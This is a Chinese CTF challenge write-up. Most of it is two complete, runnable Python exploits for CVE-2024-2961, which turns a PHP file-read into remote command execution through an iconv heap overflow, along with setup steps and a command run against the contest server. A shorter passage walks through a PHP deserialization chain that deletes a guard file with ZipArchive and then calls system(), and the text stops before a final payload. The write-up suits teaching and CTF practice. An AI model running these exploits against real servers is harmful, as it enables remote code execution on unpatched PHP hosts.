SpringCTF出题WP

readfile

解法一：

这也是个CVE：CVE-2024-2961

网上可以找到POC脚本：https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py

不过要结合这题改一改

源码：

 <?php
if(isset($_POST['filename'])){
    echo "Contents:".file_get_contents($_POST['filename']);
}
highlight_file(__FILE__);
?>

这样应该就可以了的，不过放到比赛平台测试发现读文件的时候会有乱码字符导致报错，可以借助AI改一改：

将上面这部分get_regions()函数修改成下面即可

def get_regions(self) -> list[Region]:
        """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
        maps = self.get_file("/proc/self/maps")

        # 清理二进制数据：只保留有效的地址行
        maps_data = b""
        for line in maps.split(b'\n'):
            line = line.strip()
            # 只保留以十六进制地址开头的行（格式：xxxxxxxx-xxxxxxxx）
            if re.match(rb'^[0-9a-f]+-[0-9a-f]+', line):
                maps_data += line + b'\n'

        # 如果清理后没有数据，回退到原始数据
        if not maps_data:
            maps_data = maps

        maps = maps_data.decode('utf-8', errors='ignore')

        # 确保解码后是有效的文本
        maps = maps.replace('\x00', '')
        maps = maps.replace('\r', '')

        # 再次过滤，只保留有效的行
        clean_lines = []
        for line in maps.split('\n'):
            line = line.strip()
            if re.match(r'^[0-9a-f]+-[0-9a-f]+', line):
                clean_lines.append(line)

        maps = '\n'.join(clean_lines)

        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []
        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                # 调试输出
                print(f"[!] Unable to parse line: {region[:100]}")
                # 不抛出错误，继续处理其他行
                continue

        if not regions:
            failure("Unable to parse any memory mappings")

        self.log.info(f"Got {len(regions)} memory regions")

        return regions

完整EXP脚本：

#!/usr/bin/env python3
#
# CNEXT: PHP file-read to RCE (CVE-2024-2961)
# Date: 2024-05-27
# Author: Charles FOL @cfreal_ (LEXFO/AMBIONICS)
#
# TODO Parse LIBC to know if patched
#
# INFORMATIONS
#
# To use, implement the Remote class, which tells the exploit how to send the payload.
#

from __future__ import annotations

import base64
import zlib

from dataclasses import dataclass
from requests.exceptions import ConnectionError, ChunkedEncodingError

from pwn import *
from ten import *

HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


class Remote:
    """A helper class to send the payload and download files.

    The logic of the exploit is always the same, but the exploit needs to know how to
    download files (/proc/self/maps and libc) and how to send the payload.

    The code here serves as an example that attacks a page that looks like:

    ###
    <?php

    $data = file_get_contents($_POST['file']);
    echo "File contents: $data";
    ###

    Tweak it to fit your target, and start the exploit.
    """

    def __init__(self, url: str) -> None:
        self.url = url
        self.session = Session()

    def send(self, path: str) -> Response:
        """Sends given `path` to the HTTP server. Returns the response.
        """
        return self.session.post(self.url, data={"filename": path})

    def download(self, path: str) -> bytes:
        """Returns the contents of a remote file.
        """
        path = f"php://filter/convert.base64-encode/resource={path}"
        response = self.send(path)
        data = response.re.search(b"Contents:(.*)", flags=re.S).group(1)
        return base64.decode(data)


@entry
@arg("url", "Target URL")
@arg("command", "Command to run on the system; limited to 0x140 bytes")
@arg("sleep", "Time to sleep to assert that the exploit worked. By default, 1.")
@arg("heap", "Address of the main zend_mm_heap structure.")
@arg(
    "pad",
    "Number of 0x100 chunks to pad with. If the website makes a lot of heap "
    "operations with this size, increase this. Defaults to 20.",
)
@dataclass
class Exploit:
    """CNEXT exploit: RCE using a file read primitive in PHP."""

    url: str
    command: str
    sleep: int = 1
    heap: str = None
    pad: int = 20

    def __post_init__(self):
        self.remote = Remote(self.url)
        self.log = logger("EXPLOIT")
        self.info = {}
        self.heap = self.heap and int(self.heap, 16)

    def check_vulnerable(self) -> None:
        """Checks whether the target is reachable and properly allows for the various
        wrappers and filters that the exploit needs.
        """

        def safe_download(path: str) -> bytes:
            try:
                return self.remote.download(path)
            except ConnectionError:
                failure("Target not [b]reachable[/] ?")

        def check_token(text: str, path: str) -> bool:
            result = safe_download(path)
            return text.encode() == result

        text = tf.random.string(50).encode()
        base64 = b64(text, misalign=True).decode()
        path = f"data:text/plain;base64,{base64}"

        result = safe_download(path)

        if text not in result:
            msg_failure("Remote.download did not return the test string")
            print("--------------------")
            print(f"Expected test string: {text}")
            print(f"Got: {result}")
            print("--------------------")
            failure("If your code works fine, it means that the [i]data://[/] wrapper does not work")

        msg_info("The [i]data://[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(text.encode(), misalign=True).decode()
        path = f"php://filter//resource=data:text/plain;base64,{base64}"
        if not check_token(text, path):
            failure("The [i]php://filter/[/] wrapper does not work")

        msg_info("The [i]php://filter/[/] wrapper works")

        text = tf.random.string(50)
        base64 = b64(compress(text.encode()), misalign=True).decode()
        path = f"php://filter/zlib.inflate/resource=data:text/plain;base64,{base64}"

        if not check_token(text, path):
            failure("The [i]zlib[/] extension is not enabled")

        msg_info("The [i]zlib[/] extension is enabled")

        msg_success("Exploit preconditions are satisfied")

    def get_file(self, path: str) -> bytes:
        with msg_status(f"Downloading [i]{path}[/]..."):
            return self.remote.download(path)

    def get_regions(self) -> list[Region]:
        """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
        maps = self.get_file("/proc/self/maps")

        # 清理二进制数据：只保留有效的地址行
        maps_data = b""
        for line in maps.split(b'\n'):
            line = line.strip()
            # 只保留以十六进制地址开头的行（格式：xxxxxxxx-xxxxxxxx）
            if re.match(rb'^[0-9a-f]+-[0-9a-f]+', line):
                maps_data += line + b'\n'

        # 如果清理后没有数据，回退到原始数据
        if not maps_data:
            maps_data = maps

        maps = maps_data.decode('utf-8', errors='ignore')

        # 确保解码后是有效的文本
        maps = maps.replace('\x00', '')
        maps = maps.replace('\r', '')

        # 再次过滤，只保留有效的行
        clean_lines = []
        for line in maps.split('\n'):
            line = line.strip()
            if re.match(r'^[0-9a-f]+-[0-9a-f]+', line):
                clean_lines.append(line)

        maps = '\n'.join(clean_lines)

        PATTERN = re.compile(
            r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
        )
        regions = []
        for region in table.split(maps, strip=True):
            if match := PATTERN.match(region):
                start = int(match.group(1), 16)
                stop = int(match.group(2), 16)
                permissions = match.group(3)
                path = match.group(4)
                if "/" in path or "[" in path:
                    path = path.rsplit(" ", 1)[-1]
                else:
                    path = ""
                current = Region(start, stop, permissions, path)
                regions.append(current)
            else:
                # 调试输出
                print(f"[!] Unable to parse line: {region[:100]}")
                # 不抛出错误，继续处理其他行
                continue

        if not regions:
            failure("Unable to parse any memory mappings")

        self.log.info(f"Got {len(regions)} memory regions")

        return regions

    def get_symbols_and_addresses(self) -> None:
        """Obtains useful symbols and addresses from the file read primitive."""
        regions = self.get_regions()

        LIBC_FILE = "/dev/shm/cnext-libc"

        # PHP's heap

        self.info["heap"] = self.heap or self.find_main_heap(regions)

        # Libc

        libc = self._get_region(regions, "libc-", "libc.so")

        self.download_file(libc.path, LIBC_FILE)

        self.info["libc"] = ELF(LIBC_FILE, checksec=False)
        self.info["libc"].address = libc.start

    def _get_region(self, regions: list[Region], *names: str) -> Region:
        """Returns the first region whose name matches one of the given names."""
        for region in regions:
            if any(name in region.path for name in names):
                break
        else:
            failure("Unable to locate region")

        return region

    def download_file(self, remote_path: str, local_path: str) -> None:
        """Downloads `remote_path` to `local_path`"""
        data = self.get_file(remote_path)
        Path(local_path).write(data)

    def find_main_heap(self, regions: list[Region]) -> Region:
        # Any anonymous RW region with a size superior to the base heap size is a
        # candidate. The heap is at the bottom of the region.
        heaps = [
            region.stop - HEAP_SIZE + 0x40
            for region in reversed(regions)
            if region.permissions == "rw-p"
            and region.size >= HEAP_SIZE
            and region.stop & (HEAP_SIZE - 1) == 0
            and region.path in ("", "[anon:zend_alloc]")
        ]

        if not heaps:
            failure("Unable to find PHP's main heap in memory")

        first = heaps[0]

        if len(heaps) > 1:
            heaps = ", ".join(map(hex, heaps))
            msg_info(f"Potential heaps: [i]{heaps}[/] (using first)")
        else:
            msg_info(f"Using [i]{hex(first)}[/] as heap")

        return first

    def run(self) -> None:
        self.check_vulnerable()
        self.get_symbols_and_addresses()
        self.exploit()

    def build_exploit_path(self) -> str:
        """On each step of the exploit, a filter will process each chunk one after the
        other. Processing generally involves making some kind of operation either
        on the chunk or in a destination chunk of the same size. Each operation is
        applied on every single chunk; you cannot make PHP apply iconv on the first 10
        chunks and leave the rest in place. That's where the difficulties come from.

        Keep in mind that we know the address of the main heap, and the libraries.
        ASLR/PIE do not matter here.

        The idea is to use the bug to make the freelist for chunks of size 0x100 point
        lower. For instance, we have the following free list:

        ... -> 0x7fffAABBCC900 -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB00

        By triggering the bug from chunk ..900, we get:

        ... -> 0x7fffAABBCCA00 -> 0x7fffAABBCCB48 -> ???

        That's step 3.

        Now, in order to control the free list, and make it point whereever we want,
        we need to have previously put a pointer at address 0x7fffAABBCCB48. To do so,
        we'd have to have allocated 0x7fffAABBCCB00 and set our pointer at offset 0x48.
        That's step 2.

        Now, if we were to perform step2 an then step3 without anything else, we'd have
        a problem: after step2 has been processed, the free list goes bottom-up, like:

        0x7fffAABBCCB00 -> 0x7fffAABBCCA00 -> 0x7fffAABBCC900

        We need to go the other way around. That's why we have step 1: it just allocates
        chunks. When they get freed, they reverse the free list. Now step2 allocates in
        reverse order, and therefore after step2, chunks are in the correct order.

        Another problem comes up.

        To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
        Since step2 creates chunks that contain pointers and pointers are generally not
        UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
        To avoid this, we put the chunks in step2 at the very end of the chain, and
        prefix them with `0\n`. When dechunked (right before the iconv), they will
        "disappear" from the chain, preserving them from the character set conversion
        and saving us from an unwanted processing error that would stop the processing
        chain.

        After step3 we have a corrupted freelist with an arbitrary pointer into it. We
        don't know the precise layout of the heap, but we know that at the top of the
        heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
        Its free_slot[] array contains a pointer to each free list. By overwriting it,
        we can make PHP allocate chunks whereever we want. In addition, its custom_heap
        field contains pointers to hook functions for emalloc, efree, and erealloc
        (similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
        then overwrite the use_custom_heap flag to make PHP use these function pointers
        instead. We can now do our favorite CTF technique and get a call to
        system(<chunk>).
        We make sure that the "system" command kills the current process to avoid other
        system() calls with random chunk data, leading to undefined behaviour.

        The pad blocks just "pad" our allocations so that even if the heap of the
        process is in a random state, we still get contiguous, in order chunks for our
        exploit.

        Therefore, the whole process described here CANNOT crash. Everything falls
        perfectly in place, and nothing can get in the middle of our allocations.
        """

        LIBC = self.info["libc"]
        ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
        ADDR_EFREE = LIBC.symbols["__libc_system"]
        ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]

        ADDR_HEAP = self.info["heap"]
        ADDR_FREE_SLOT = ADDR_HEAP + 0x20
        ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

        ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

        CS = 0x100

        # Pad needs to stay at size 0x100 at every step
        pad_size = CS - 0x18
        pad = b"\x00" * pad_size
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = chunked_chunk(pad, len(pad) + 6)
        pad = compressed_bucket(pad)

        step1_size = 1
        step1 = b"\x00" * step1_size
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1)
        step1 = chunked_chunk(step1, CS)
        step1 = compressed_bucket(step1)

        # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
        # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

        step2_size = 0x48
        step2 = b"\x00" * (step2_size + 8)
        step2 = chunked_chunk(step2, CS)
        step2 = chunked_chunk(step2)
        step2 = compressed_bucket(step2)

        step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
        step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
        step2_write_ptr = chunked_chunk(step2_write_ptr)
        step2_write_ptr = compressed_bucket(step2_write_ptr)

        step3_size = CS

        step3 = b"\x00" * step3_size
        assert len(step3) == CS
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = chunked_chunk(step3)
        step3 = compressed_bucket(step3)

        step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
        assert len(step3_overflow) == CS
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = chunked_chunk(step3_overflow)
        step3_overflow = compressed_bucket(step3_overflow)

        step4_size = CS
        step4 = b"=00" + b"\x00" * (step4_size - 1)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = chunked_chunk(step4)
        step4 = compressed_bucket(step4)

        # This chunk will eventually overwrite mm_heap->free_slot
        # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
        step4_pwn = ptr_bucket(
            0x200000,
            0,
            # free_slot
            0,
            0,
            ADDR_CUSTOM_HEAP,  # 0x18
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            ADDR_HEAP,  # 0x140
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            0,
            size=CS,
        )

        step4_custom_heap = ptr_bucket(
            ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
        )

        step4_use_custom_heap_size = 0x140

        COMMAND = self.command
        COMMAND = f"kill -9 $PPID; {COMMAND}"
        if self.sleep:
            COMMAND = f"sleep {self.sleep}; {COMMAND}"
        COMMAND = COMMAND.encode() + b"\x00"

        assert (
                len(COMMAND) <= step4_use_custom_heap_size
        ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
        COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

        step4_use_custom_heap = COMMAND
        step4_use_custom_heap = qpe(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
        step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)

        pages = (
                step4 * 3
                + step4_pwn
                + step4_custom_heap
                + step4_use_custom_heap
                + step3_overflow
                + pad * self.pad
                + step1 * 3
                + step2_write_ptr
                + step2 * 2
        )

        resource = compress(compress(pages))
        resource = b64(resource)
        resource = f"data:text/plain;base64,{resource.decode()}"

        filters = [
            # Create buckets
            "zlib.inflate",
            "zlib.inflate",

            # Step 0: Setup heap
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 1: Reverse FL order
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 2: Put fake pointer and make FL order back to normal
            "dechunk",
            "convert.iconv.L1.L1",

            # Step 3: Trigger overflow
            "dechunk",
            "convert.iconv.UTF-8.ISO-2022-CN-EXT",

            # Step 4: Allocate at arbitrary address and change zend_mm_heap
            "convert.quoted-printable-decode",
            "convert.iconv.L1.L1",
        ]
        filters = "|".join(filters)
        path = f"php://filter/read={filters}/resource={resource}"

        return path

    @inform("Triggering...")
    def exploit(self) -> None:
        path = self.build_exploit_path()
        start = time.time()

        try:
            self.remote.send(path)
        except (ConnectionError, ChunkedEncodingError):
            pass

        msg_print()

        if not self.sleep:
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]")
        elif start + self.sleep <= time.time():
            msg_print("    [b white on black] EXPLOIT [/][b white on green] SUCCESS [/]")
        else:
            # Wrong heap, maybe? If the exploited suggested others, use them!
            msg_print("    [b white on black] EXPLOIT [/][b white on red] FAILURE [/]")

        msg_print()


def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`.
    """
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload.encode()


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode.
    """
    return "".join(f"={x:02x}" for x in data).upper().encode()


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str

    @property
    def size(self) -> int:
        return self.stop - self.start


Exploit()

在kali里开个虚拟环境，把需要的库装好，然后就可以运行了：

# 安装虚拟环境
python -m venv myenv
# 激活虚拟环境
source myenv/bin/activate
# 安装需要的ten库
pip install ten
# 安装pwn环境
pip install -i https://pypi.tuna.tsinghua.edu.cn/simple pwntools

然后执行命令

python 1.py http://spring.huhstsec.top:33124/ "env > 1.txt"

解法二：

还有种解法是自己手动找到俩文件，放到脚本里进行RCE

EXP脚本：

from dataclasses import dataclass
from pwn import *
import zlib
import os
import binascii

HEAP_SIZE = 2 * 1024 * 1024
BUG = "劄".encode("utf-8")


@dataclass
class Region:
    """A memory region."""

    start: int
    stop: int
    permissions: str
    path: str

    @property
    def size(self):
        return self.stop - self.start


def print_hex(data):
    hex_string = binascii.hexlify(data).decode()
    print(hex_string)


def chunked_chunk(data: bytes, size: int = None) -> bytes:
    """Constructs a chunked representation of the given chunk. If size is given, the
    chunked representation has size `size`.
    For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
    """
    # The caller does not care about the size: let's just add 8, which is more than
    # enough
    if size is None:
        size = len(data) + 8
    keep = len(data) + len(b"\n\n")
    size = f"{len(data):x}".rjust(size - keep, "0")
    return size.encode() + b"\n" + data + b"\n"


def compressed_bucket(data: bytes) -> bytes:
    """Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
    return chunked_chunk(data, 0x8000)


def compress(data) -> bytes:
    """Returns data suitable for `zlib.inflate`.
    """
    # Remove 2-byte header and 4-byte checksum
    return zlib.compress(data, 9)[2:-4]


def ptr_bucket(*ptrs, size=None) -> bytes:
    """Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
    if size is not None:
        assert len(ptrs) * 8 == size
    bucket = b"".join(map(p64, ptrs))
    bucket = qpe(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = chunked_chunk(bucket)
    bucket = compressed_bucket(bucket)

    return bucket


def qpe(data: bytes) -> bytes:
    """Emulates quoted-printable-encode.
    """
    return "".join(f"={x:02x}" for x in data).upper().encode()


def b64(data: bytes, misalign=True) -> bytes:
    payload = base64.b64encode(data)
    if not misalign and payload.endswith("="):
        raise ValueError(f"Misaligned: {data}")
    return payload


def _get_region(regions, *names):
    """Returns the first region whose name matches one of the given names."""
    for region in regions:
        if any(name in region.path for name in names):
            break
    else:
        failure("Unable to locate region")
    return region


def find_main_heap(regions):
    # Any anonymous RW region with a size superior to the base heap size is a
    # candidate. The heap is at the bottom of the region.
    heaps = [
        region.stop - HEAP_SIZE + 0x40
        for region in reversed(regions)
        if region.permissions == "rw-p"
        and region.size >= HEAP_SIZE
        and region.stop & (HEAP_SIZE - 1) == 0
        and region.path == ""
    ]

    if not heaps:
        failure("Unable to find PHP's main heap in memory")

    first = heaps[0]

    if len(heaps) > 1:
        heaps = ", ".join(map(hex, heaps))
        print("Potential heaps: " + heaps + " (using first)")
    else:
        print("[*]Using " + hex(first) + " as heap")

    return first


def get_regions(maps_path):
    """Obtains the memory regions of the PHP process by querying /proc/self/maps."""
    f = open('maps', 'rb')
    maps = f.read().decode()
    PATTERN = re.compile(
        r"^([a-f0-9]+)-([a-f0-9]+)\b" r".*" r"\s([-rwx]{3}[ps])\s" r"(.*)"
    )
    regions = []
    for region in maps.split("\n"):
        # print(region)
        match = PATTERN.match(region)
        if match:
            start = int(match.group(1), 16)
            stop = int(match.group(2), 16)
            permissions = match.group(3)
            path = match.group(4)
            if "/" in path or "[" in path:
                path = path.rsplit(" ", 1)[-1]
            else:
                path = ""
            current = Region(start, stop, permissions, path)
            regions.append(current)
        else:
            print("[*]Unable to parse memory mappings")

    print("[*]Got " + str(len(regions)) + " memory regions")
    return regions


def get_symbols_and_addresses(regions):
    # PHP's heap
    heap = find_main_heap(regions)

    # Libc
    libc_info = _get_region(regions, "libc-", "libc.so")

    return heap, libc_info


def build_exploit_path(libc, heap, sleep, padding, cmd):
    LIBC = libc
    ADDR_EMALLOC = LIBC.symbols["__libc_malloc"]
    ADDR_EFREE = LIBC.symbols["__libc_system"]
    ADDR_EREALLOC = LIBC.symbols["__libc_realloc"]
    ADDR_HEAP = heap
    ADDR_FREE_SLOT = ADDR_HEAP + 0x20
    ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168

    ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10

    CS = 0x100

    # Pad needs to stay at size 0x100 at every step
    pad_size = CS - 0x18
    pad = b"\x00" * pad_size
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = chunked_chunk(pad, len(pad) + 6)
    pad = compressed_bucket(pad)

    step1_size = 1
    step1 = b"\x00" * step1_size
    step1 = chunked_chunk(step1)
    step1 = chunked_chunk(step1)
    step1 = chunked_chunk(step1, CS)
    step1 = compressed_bucket(step1)

    # Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
    # ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"

    step2_size = 0x48
    step2 = b"\x00" * (step2_size + 8)
    step2 = chunked_chunk(step2, CS)
    step2 = chunked_chunk(step2)
    step2 = compressed_bucket(step2)

    step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
    step2_write_ptr = chunked_chunk(step2_write_ptr, CS)
    step2_write_ptr = chunked_chunk(step2_write_ptr)
    step2_write_ptr = compressed_bucket(step2_write_ptr)

    step3_size = CS

    step3 = b"\x00" * step3_size
    assert len(step3) == CS
    step3 = chunked_chunk(step3)
    step3 = chunked_chunk(step3)
    step3 = chunked_chunk(step3)
    step3 = compressed_bucket(step3)

    step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
    assert len(step3_overflow) == CS
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = chunked_chunk(step3_overflow)
    step3_overflow = compressed_bucket(step3_overflow)

    step4_size = CS
    step4 = b"=00" + b"\x00" * (step4_size - 1)
    step4 = chunked_chunk(step4)
    step4 = chunked_chunk(step4)
    step4 = chunked_chunk(step4)
    step4 = compressed_bucket(step4)

    # This chunk will eventually overwrite mm_heap->free_slot
    # it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
    step4_pwn = ptr_bucket(
        0x200000,
        0,
        # free_slot
        0,
        0,
        ADDR_CUSTOM_HEAP,  # 0x18
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        ADDR_HEAP,  # 0x140
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        0,
        size=CS,
    )

    step4_custom_heap = ptr_bucket(
        ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
    )

    step4_use_custom_heap_size = 0x140

    COMMAND = cmd
    COMMAND = f"kill -9 $PPID; {COMMAND}"
    if sleep:
        COMMAND = f"sleep {sleep}; {COMMAND}"
    COMMAND = COMMAND.encode() + b"\x00"

    assert (
            len(COMMAND) <= step4_use_custom_heap_size
    ), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
    COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")

    step4_use_custom_heap = COMMAND
    step4_use_custom_heap = qpe(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = chunked_chunk(step4_use_custom_heap)
    step4_use_custom_heap = compressed_bucket(step4_use_custom_heap)
    pages = (
            step4 * 3
            + step4_pwn
            + step4_custom_heap
            + step4_use_custom_heap
            + step3_overflow
            + pad * padding
            + step1 * 3
            + step2_write_ptr
            + step2 * 2
    )

    resource = compress(compress(pages))
    resource = b64(resource)
    resource = f"data:text/plain;base64,{resource.decode()}"

    filters = [
        # Create buckets
        "zlib.inflate",
        "zlib.inflate",

        # Step 0: Setup heap
        "dechunk",
        "convert.iconv.latin1.latin1",

        # Step 1: Reverse FL order
        "dechunk",
        "convert.iconv.latin1.latin1",

        # Step 2: Put fake pointer and make FL order back to normal
        "dechunk",
        "convert.iconv.latin1.latin1",

        # Step 3: Trigger overflow
        "dechunk",
        "convert.iconv.UTF-8.ISO-2022-CN-EXT",

        # Step 4: Allocate at arbitrary address and change zend_mm_heap
        "convert.quoted-printable-decode",
        "convert.iconv.latin1.latin1",
    ]
    filters = "|".join(filters)
    path = f"php://filter/read={filters}/resource={resource}"
    path = path.replace("+", "%2b")
    return path


maps_path = './maps'
cmd = 'env > 1.txt'
sleep_time = 1
padding = 20

if not os.path.exists(maps_path):
    exit("[-]no maps file")

regions = get_regions(maps_path)
heap, libc_info = get_symbols_and_addresses(regions)

libc_path = libc_info.path
print("[*]download: " + libc_path)

libc_path = './libc-2.23.so'
if not os.path.exists(libc_path):
    exit("[-]no libc file")

libc = ELF(libc_path, checksec=False)
libc.address = libc_info.start

payload = build_exploit_path(libc, heap, sleep_time, padding, cmd)

print("[*]payload:")
print(payload)

第一个文件路径：

/proc/self/maps

将结果复制保存到maps文件里

第二个文件路径：

/lib/x86_64-linux-gnu/libc.so.6

太多了不好复制粘贴，可以右击响应包复制到文件里

保存为libc-2.23.so文件，无关的响应包内容删去

最后放到脚本的同目录下，运行脚本即可：

虽然没啥响应，但是左下角可以看到完成，然后去访问写入的文件，可以看到是执行成功的

如果是浏览器用HackBar发送请求，出现网页无法正常运行这样的错误是正常的，也是执行成功的

Native

这题是参考：铸剑杯-浅析PHP原生类

笔记：https://yschen20.github.io/2025/12/19/%E9%93%B8%E5%89%91%E6%9D%AF-%E6%B5%85%E6%9E%90PHP%E5%8E%9F%E7%94%9F%E7%B1%BB/

删除文件

删文件思路

题目源码：

<?php

highlight_file(__FILE__);
error_reporting(0);

class Start{
    public $arg;

    public function __construct($arg){
        $this->arg = $arg;
    }

    public function __destruct(){
        echo "<br>"."arg:".$this->arg."<br>";
    }

    public function __toString(){
        $this->arg->haohao;
        return "<br>"."Start Test"."<br>";
    }
}

class GetFlag{
    public $a;
    public $b;
    public $func;
    public $var;

    public function __get($arg){
        $a = $this->a;
        $b = $this->b;
        if($a!==$b && (!is_array($a)) && (!is_array($b)) && md5($a)===md5($b)){
            if(file_exists("risk.txt")){
                exit("High Risk");
            }else{
                echo "<br>"."Completely Safe"."<br>";
                $func = $this->func;
                $var = $this->var;
                $func($var);
            }
        }
    }
}

class UseFul{
    public $class;
    public $file;
    public $flags;

    public function __get($arg){
        $this->write($this->class,$this->file,$this->flags);
    }

    public function write($class,$file,$flags){
        $obj = new $class();
        $obj->open($file,$flags);
        echo "<br>"."Successful"."<br>";
        return true;
    }
}

unserialize($_GET['data']);

很明显可以看到利用点在GetFlag类的__get()魔术方法中的$func($var);，这可以直接RCE了，令$func为system，$var为要执行的命令即可

if(file_exists("risk.txt")){
    exit("High Risk");
}else{
    echo "<br>"."Completely Safe"."<br>";
    $func = $this->func;
    $var = $this->var;
    $func($var);
}

然后看看如何才能执行到这句代码，会发现有个if判断是否存在risk.txt文件，如果不存在才会执行到我们想要的代码，这里可以访问一下发现文件是存在的：

题目描述里也有提到怎么才能删掉危险文件呢？再后来也给了hint：学习一下PHP原生类吧

所以就是要利用原生类来讲这个risk.txt文件删去

笔记：https://yschen20.github.io/2025/12/18/PHP%E5%8E%9F%E7%94%9F%E7%B1%BB%E5%88%A9%E7%94%A8/#%E5%8F%AF%E5%88%A0%E9%99%A4%E6%96%87%E4%BB%B6%E7%9A%84%E7%B1%BB

可以利用ZipArchive类的open()方法来删除文件，刚好在UseFul类的write()方法中有调用这个open()方法

public function write($class,$file,$flags){
    $obj = new $class();
    $obj->open($file,$flags);
    echo "<br>"."Successful"."<br>";
    return true;
}

并且write()函数内容和ZipArchive类的利用方式一致，就可以将传入write的三个参数分别设置为：

$class ==> ZipArchive
$file  ==> risk.txt
$flags ==> 8

然后就是要找怎么才能调用到write()方法，就是在该类的__get()魔术方法中可以调用

public function __get($arg){
    $this->write($this->class,$this->file,$this->flags);
}

